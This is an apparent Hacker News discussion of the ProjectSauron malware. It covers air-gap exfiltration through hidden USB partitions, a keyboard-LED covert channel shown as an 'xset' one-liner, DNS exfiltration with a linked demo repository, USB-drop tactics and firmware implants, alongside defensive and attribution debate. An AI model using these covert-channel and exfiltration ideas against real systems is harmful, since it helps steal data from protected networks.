AFAIK one could mitigate something like this by really restrictive udev rules only allowing certain usb drivers on certain usb ports (like no usb msc on the port dedicated for keyboard only).


Personally? PC gets locked in a box with some sort of venting. Keyboard / Mouse are plugged in by IT and no one unauthorized has physical access to the PC itself.

If they're serious enough about finding 0 days and exploits to the USB or OS to load this shit any physical access to the box itself is off limits.


Cut USB cable; splice new device into cable. Or, open mouse/keyboard case, wire device into USB bus connections.


This is why you need defense in depth: physical seals on components, either protecting cables or keeping them clearly visible where someone can notice tampering, and – above all – having the physical space setup to strictly limit someone's ability to bring arbitrary objects in or spend time alone with sensitive hardware.

Consider what someone with the time, skill, and access to do that could also do without that: opening the case and directly installing some sort of device, planting a camera which records you typing passwords in (“oops, left my cellphone sitting out. Won't happen again!”), planting a radio receiver which opens up all sorts of side channel attacks, installing a passive network tap, etc.

A guard with a metal detector and strict limits on what you can bring into the building or what tools you can use inside is going to do a better job preventing all of those.


Wireless RF keyboard+mouse, external antennas outside of the shielded case?


Can be defeated by a phone charger.

http://samy.pl/keysweeper/


This is genius.


You can mitigate the exploit against standard mass storage drivers, yes, but there are other ways. It appears in this case the host was compromised (so able to override the drivers).

If a userland program can get at the raw HID interface, that can also be used for exfiltration to a tailored device.


  xset led named 'Scroll Lock'
Slow, but works for PS/2 keyboards too.


Depends on having a camera pointed that the compromised keyboard, and cameras are the first things banned when setting up a secure environment.


I meant, using a physically compromised keyboard that records LED transitions set by the host, since the context was USB devices that look like normal keyboard or mice but actually contain storage.


The only problem with that is people don't typically carry keyboards around and plug them into different devices.


There's usually going to be some interface between the two worlds, right? You just want it to be highly controlled.

What's left? Optical media? Or are we seriously reduced to a human with two computers reading from one and typing into the other?


Zip disks?


You would also need proper shielding to prevent van Eck phreaking from PS/2, monitor, video card, sound card, internal memory bus, and other rf noise.


And they had every login for the network it was found on:

"The library was masquerading as a Windows password filter, which is something administrators typically use to ensure passwords match specific requirements for length and complexity. The module started every time a network or local user logged in or changed a password, and it was able to view passcodes in plaintext."


Perhaps time to move to 2FA.


This was a network authentication module on a domain controller. It's intercepting every low level token used to authenticate a network transaction, including encryption keys.


If security has been penetrated that far you are already owned.

What really scares me are things that can live in firmware; not just on mass storage drives but also in host system firmware. We've let too many dragons breed in dark places in the name of Digital Restrictions Management.


Can you clarify what exactly is so impressive about this software? I read the article, and I don't see it.


This seems to be the crux of it:

Part of what makes ProjectSauron so impressive is its ability to collect data from air-gapped computers. To do this, it uses specially prepared USB storage drives that have a virtual file system that isn't viewable by the Windows operating system. To infected computers, the removable drives appear to be approved devices, but behind the scenes are several hundred megabytes reserved for storing data that is kept on the air-gapped machines. The arrangement works even against computers in which data-loss prevention software blocks the use of unknown USB drives.


Okay first, it probably doesn't get information from air gapped computers without being plugged in, so let's quit with the voodoo right now. You guys are discounting the possibility of idiocy.

Second, making partitions that windows doesn't see is trivially easy. I went out of my way to buy a 128gb flash drive nearly 10 years ago at great expense, it had a 4gb fat 32 partition which is what Windows would see.

It had an 16gb Linux partition with 8gb of that being an encrypted partition

I installed a bootloader that allowed it to be switched to if plugged in when any computer was starting up

The other 100gb you ask? Another partition....


"making partitions that windows doesn't see is trivially easy"

Are we talking "partitions Windows wont mount because they aren't FAT/NTFS" or "partitions that literally do not show up to Windows Disk Management because the disk itself is showing a different capacity. EG: A 16GB USB reporting only 8GB, regardless of the OS installed"

Like one of these, only malicious

https://www.neowin.net/news/fake-chinese-500-gb-external-dri...


A big chunk of space would take some work, but if you only needed a few KB there is slack space (at least a handful of sectors) on the end of every USB drive that doesn't align with partition sizes. I've used it before to store data on how many times my reformatting tool was used on the disk.


I'm not sure. I lost the flash drive, despite living in a tiny one bedroom apartment in Manhattan. Maybe a 3 letter agency took it while I was away.


>Okay first, it probably doesn't get information from air gapped computers without being plugged in, //

A hidden WiFi to create a mesh network, or use ultrasound, seems doable.


Stealth. Being found after 5 years is considerably better concealment than most malware (that is discovered at all).


This seems trivial to me. Heck, you could practically make it full out remote exec and grab output from airgapped machines if USB keys were moved between them frequently enough. Serialize and encrypt tiny blob with command, do the same for the output and dump it back on the same USB drive or the next one plugged in, send the data out the next time it's on an internet connected machine... I don't see any challenge or skill involved here. Good post-exploitation malware is often more about doing simple things right than about doing impressive things though I suppose. Having the exploit that allows this attack to happen is the impressive part.


Heh I gave a talk at DefCon Skytalks last week on this exact exfil method and C&C structure with a live demo using code we wrote....interesting.


> Heh I gave a talk at DefCon Skytalks last week on this exact exfil method and C&C structure with a live demo using code we wrote....interesting.

> Kaspersky researchers still aren't sure precisely how the USB-enabled exfiltration works. The presence of the invisible storage area doesn't in itself allow attackers to seize control of air-gapped computers. The researchers suspect the capability is used only in rare cases and requires use of a zero-day exploit that has yet to be discovered. In all, Project Sauron is made up of at least 50 modules that can be mixed and matched to suit the objectives of each individual infection.

You remarkably have the exact exfil method when that's not disclosed information?


>The attackers used multiple interesting and unusual techniques, including:

> Data exfiltration and real-time status reporting using DNS requests.

Sorry to be more specific we spoke on DNS Base Exfil using base64 encoded strings in DNS Lookups and also how to use DNS records to control botnets.

So not exact and only part of their method.


Is there any part of your talk available online?


This is pretty much the only part. The code from the live demo. I will try and find a place to get the slides up in the next few days if there is any interest:

https://github.com/coryschwartz/dns_exfiltration


I was at the conference but missed this talk. I would love to see the slides. Congrats on speaking at Defcon.


Any further comments on the need for nation-state sized budgets, based on your work?


What criteria is used to determine that malware could only possibly have been made by a nation state? If all it takes is specialist teams and a budget in the millions of dollars (presumably, had it been 10s or 100s of millions, that's what they'd call it), lot's of private entities can pull that together, can't they?


They simply pretend that all skilled attackers are state actors.

Due to how the industry works, they're usually correct.


They probably could, but would they?

At least in the US, publicly traded tech companies are accountable to shareholders: There's some transparency in the accounting, and it's hard for them to throw millions of dollars at a problem before shareholders start asking tough questions.


But a military contractor type of company has lots of obfuscation leeway with "top secret" type of things, doesn't it? And I'd imagine a defence contractor is the type of company that would be interested in the kind of info this kind of malware can gather.


There is some evidence that CITIC Group, a Chinese company, is heavily involved in corporate espionage and the manipulation of foreign nations. There's no particular reason that other large companies, no matter their home countries, could not also be engaged in these types of activities.



My gut feel is that governments have a much more significant ability to do things such as: "hey, we're going to do this thing and you're not entitled to ask about it" than private sector.


Is the implication that there must be someone who connects the special USB drives to these air-gapped computers? So the attacker must have local people on the ground.


Well one of the linked/related attacks, called "Equation," was apparently distributed at least once via CD without a person on the ground (near the target, at least).

It says that the CD, containing data about a recent research expedition, was mailed to an academic. It was apparently intercepted in the mail, compromised, and forwarded on.


This the other kind of MiTM attack: Man in the Mail.


Supposedly, the "drop USB drives in the parking lot" works pretty well to get around air-gapped systems. As well as mailing USB drives to the receptionist, mail room, etc.

Also, this thing was running as a local admin on a domain controller. So either the DC's weren't patched or some zero-days were used. Or perhaps an inside job.


Not supposedly. Every pen testing company worth their salt uses dropped USB drives and have a very high success rate, because humans suck at security. The malware infects non-gapped systems until it infects a file which is being copied to a gapped system.


The DoD Cybersecurity Awareness training[1] covers this and a number of other physical attacks. I'm not sure how serious anyone takes it though.

[1] http://cdsetrain.dtic.mil/cybersecurity/


Well it worked on Mr Robot at least


> the DC's weren't patched

As I understand it, airgapped systems are not in the habit of bringing software updates across the airgap, so unpatched everything is likely.


Its trivial to do with WSUS and off-line updates. But yeah, if its a shit run environment, it will get owned by someone eventually.


An air-gapped set of servers performing updates from a non-air-gapped WSUS server are not air-gapped servers at all.

If the WSUS server were also air-gapped, then you're in the business of manually downloading each update, verifying it, and copying it to over to the air-gapped WSUS server offline.

Microsoft's Windows Update servers have also been compromised in the past. Depending on the level of security you're operating at, taking new windows updates on your air-gapped systems may require having someone decompile and review each update.

In general, being air-gapped prevents infinitely more exploits than windows updates could ever possibly cure; that is, until one of your admins uses his admin privileges to disable the USB port restrictions for 5 minutes that one time to copy that one file quickly so he can go home for the day. For this, there are epoxied USB ports.


> running as a local admin on a domain controller

To nitpick, domain controllers don't have local accounts at all. It was probably running as SYSTEM which equates to the domain controller's computer account for AD.


The thing I find interesting is that I bet the authors are reading this.


Some at the NSA is having a bad day reading this.


The article says it was first deployed in 2011. Five years is a pretty good run. I wonder what they're deploying right now?


Probably to the Intel Management Engine/AMD Platform Security Processor. By the time your machine is booting it is too late to detect the infection. Reinstalls won't work.

If I wanted to own a machine and not be detected, that's where I'd live. It's also complex and closed source so you are basically guaranteed to have exploitable bugs that won't be fixed. It has access to network and system busses at a layer below the OS so ex-filtrating can be done at a layer below what the OS can see.


There's been sufficient evidence that they are involved in hacking/rewriting HDD firmware. See: https://www.wired.com/2015/02/nsa-firmware-hacking/


Now they are in the SMC and the secure enclave.


As to the secure enclave, the very nature of a target that's in SO MANY hands, means that's it's unlikely to ever remain secure from a motivated state. It's such a catch-22... buy into the mass production, or have something that might really be strongly encrypted, but stands out like a sore thumb by virtue of not being the mass production model?


>Five years is a pretty good run.

For a project this big & complex, and for something that cost hundreds of millions of dollars to develop, 5 years is paltry. Duqu remained hidden for 11+ years.


Bizarrely, the NSA and other US security agencies seem to have very little interest in defence, preferring surveillance and attack capabilities.


Not sure why that seems so bizarre; that's consistent with US posture since WWII, particularly strategic posture. Defense through force projection and construction of retaliatory capability. "The best defense is a good offense" is almost an underlying assumption of US doctrine. You don't defend yourself by building walls, you defend yourself by removing your adversaries' capabilities or willingness to use those capabilities.

It doesn't seem as though this has been especially effective with regards to information security, however. There are just too many adversaries, it's too hard to project force against them, and there's not much of an effective deterrent effect by sitting on a 'stockpile' of vulnerabilities yourself.

But IMO the disconnect is almost a fundamental one, because it's an area where what has worked fairly well for the US for 60+ years is suddenly falling flat.


There's a visibility bias there: attack capabilities in user are more likely to result in news articles; defense capabilities less so.


If only the media was quick to blame them for cyberattacks that happen under their watch, too. Then they might finally start to care. But because corporate media has such a tight relationship with all the Washington insiders, that never really happens.

One good example from recent times of how well this type of "incentive" works is Google and Stagefright. The media went nuts over Stagefright affecting virtually all Android devices - and for good reason, too.

Since then Google seems to be taking Android security way more seriously, and there have been a lot of serious security improvements in Android (7.0) over the past year.

But these sort of actions seem to happen in slow motion, if at all, when there isn't a hacking/malware catastrophe for which the companies can get blamed in the press.

The NSA pushed hard for new surveillance laws such as CISA with the promise that it's what they need to keep us safe against cyberattacks. So why isn't every single media entity blaming the NSA over every major new data breach that happened since then?


That's a false statement. They work with NIST to develop the standards that are the basis of the infosed industry.


Might be a false statement, but it's effectively true. Defense is part of their charter, but American government and corporations are clearly very vulnerable and are compromised routinely.

At this point I'd argue Google's security bounties have done more to secure the industry.


The problem with NIST (and I believe they admitted this is a problem) is that NIST is required by law to use the relevant experts from government agencies[0], which normally is fine, and exactly what you want. However, the agency when it comes to security is NSA, and their in the business of undermining it. Thus the whole ECC backdoor debacle.[1]

NIST seems like a good agency trying to do the right things. It's just that they're forced to work with bad actors.

[0] https://www.accessnow.org/its-not-you-its-me-committee-of-cr...

[1] http://www.nist.gov/itl/csd/sp800-90-042114.cfm


For the most part, NIST really has no relevance in infosec. With a few exceptions, they're always way behind, and only focus on a few narrow domains.


Literally every compliance standard in the US references NIST 800-53.

In terms of the "narrow scope" assertion: http://csrc.nist.gov/publications/PubsSPs.html


Part of the military culture, there's no glory, no medals, no promotions in a successful defence

"Department of Defence" is so PC, things were much more honest back when it it was called the "Department of War"


You have to research and implement new attacks to design its defense.


Well, what do you expect them to do for you? Nationalize and manage your IT infrastructure? They and the DoD publish security guidelines for servers, desktops, etc that any business or government agency can follow. Also do you use SELinux? That's NSA as well.

If you want regulation, that's Congress and POTUS, not the NSA.


Or they're saying, "Oh? That old thing?"

We honestly don't know. It might not even be the NSA.


>> so advanced in its design and execution that it could probably have been developed only with the active support of a nation-state

Why is advanced technology automatically assumed to have the backing of nation-states? Cant several highly motivated and smart individuals create the technology without a nation-state behind them?


That's why they said "probably".

You need to look at things like the complexity of the malware, how many staff it would take to develop and maintain it operationally, the targets selected and what sort of payloads are executed. Criminals tend to have simpler malware that used known exploits or a small number of zero days. They generally cast a wide net for their targets and their payloads typically aim to directly raise funds(ransom, mining, card theft, etc).

In contrast, nation-states tend to have complex malware with multiple zero days, greater care is taken to avoid detection, their targets are chosen carefully and their payloads focus on gathering information and specialized operations.


Some security professionals have expressed the view that insecure endpoints represent a good compromise. That is, without the US government being able to snoop on endpoint devices, encryption would have to be tightly controlled, so that the government could retain intelligence and investigatory capability.

A more cynical view would be that many security firms sell both security and forensics/surveillance. One of those two product lines has to be fundamentally defective.

Is the position that hackable endpoints are a good compromise supportable any longer? Or has it bitten US entities in the ass enough that making truly secure computing a reality for computer users, even if it blinds the surveillance state, becomes the new goal.


I've often heard not that "insecure endpoints represent a good compromise" but instead that since:

1. endpoints are vulnerable because they are exceptionally hard to secure,

2. and attacking endpoints can be targeted and specific,

the governments case that weakening encryption is necessary for warranted search is weak. Even with strong encryption the government can exploit the targeted communicant's endpoint to learn either the plaintext or the encryption keys. This isn't a compromise so much as a statement of reality and what is likely to remain reality for some time to come. Weakening encryption, for the most part, provides benefits to the government in the form of mass surveillance, but for a variety of reasons doesn't offer much benefit in the form of limited, specific searches.

>making truly secure computing a reality for computer users,

We can make endpoints more secure, but I see no path to endpoint security that will keep out a determined well resourced adversary.


You get what you pay for. Right now, endpoint systems are undefended, even intentionally compromised. The design of endpoint systems assumes all components can be trusted. But those components don't usually undergo testing for vulnerabilities and hidden capabilities.


Anyone know of an instance of airgapped USB-based exploits for Linux-based systems?


What's with all this nonsense about could have "been developed only with the active support of a nation-state"? Do nations suddenly have access to some sort of advanced, alien software development teams?

Feels more like political sabre-rattling to get the public to eventually condone a future attack from our homeland shores of Oceania against the evil Eastasia or Eurasia.


I believe it's less about fear mongering and more about understanding the level of sophistication of the software. Talk to anti malware analyst and they'll tell you how commoditized the malware game is nowadays. There's an endless stream of malware and ransomware which can be linked back to just a handful of frameworks. These types of malware families also fall under the spray-n-pray mentality for distribution. Spam, drive-by-downloads, infected torrents, etc.

Compare the mass of malware that is out there with the level of technical sophistication, OPSEC to prevent detection, and precise targeting of its victims. Along with other big name malwares (i.e. Stuxnet, Flame, etc.), this class of malware is very precise in its objective. It isn't trying to make money for its owners. It isn't trying to replicate itself across the internet endlessly. Rather it has a key objective of infecting a specific set of networks. So when researchers call out the fact that it is likely to be "state sponsored", they are saying the purpose of the malware is very different than your average piece of malware.


Everything you said is true, but I'd like to elaborate a bit further: sometimes state involvement can be inferred when the exploit involves computing resources which could only be reasonably wielded by a nation-state.

For example, suppose that this exploit involved the reversal of an MD5 hash (and this is simply an example, I'm not saying that the actual exploit did). How much computing power would be required to do this? I couldn't do this reliably on my home machine, nor could I afford the cloud-compute power to perform it. However, assembling a vast array of machines is within reach of a state sponsored intelligence agency.

So, that's often it: at some point, the computation would be so expensive that you'd have to infer that only a nation state could have financed it.


Essentially depending on what malware does we can easily identify government software because criminal software has a different set of objectives. Is it possible though that corporate software could have similar objectives? I'm thinking corporate espionage type behaviour.


> Is it possible though that corporate software could have similar objectives? I'm thinking corporate espionage type behaviour.

Yes, it is possible.


It's not that the development techniques are so special, it's that the malware was clearly designed to penetrate ultra high security environments. If you are just making malware to try to steal money, or even most corporate secrets, you don't need to go to all that trouble, so there's little financial incentive for someone other than a nation-state to build malware with those capabilities.


Anyone know what IPs the C&C servers used?

Interested to see what hosting company in the US they used.


[flagged]


Please don't comment like this here.


I think it's a great comment. Look at my comment history if if you are curious about context, downvote me if you like, but I stand by it.


> It was also funny to see "Windows" as an approved security blessed OS and then Debian, Ubuntu, OpenBSD rejected

Bribes always help.


We detached this subthread from https://news.ycombinator.com/item?id=12255106 and marked it off-topic.


Paying for certification is what's required. Governments require various certifications to sell to them, and that certification costs money in consultancies. RHEL paid for the testing, they get a certification and access to the customer.

It looks like this is probably referring to EAL [1][2].

In a market with a large number of vendors interacting with a large number of relatively unknowledgeable buyers, an oversight team is going to try to find a certification to give guidance (and ass covering).

Yes, this is a barrier to entry, but it's also a learned behaviour as buyers get repeatedly burned.

I would argue that this is equivalent to requiring your plumbers and electricians to be licensed.

[1] https://en.wikipedia.org/wiki/Evaluation_Assurance_Level [2] https://www.redhat.com/en/about/press-releases/red-hat-achie...


EAL (Common Criteria) and also FIPS-140-2 for crypto.


It's easy to see conspiracy everywhere, but the truth is usually much more mundane. It costs a lot of money to security-certify an OS, so they probably only wanted to certify a small number. Windows is obviously the most-used desktop OS for PCs, so that seems the logical choice.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: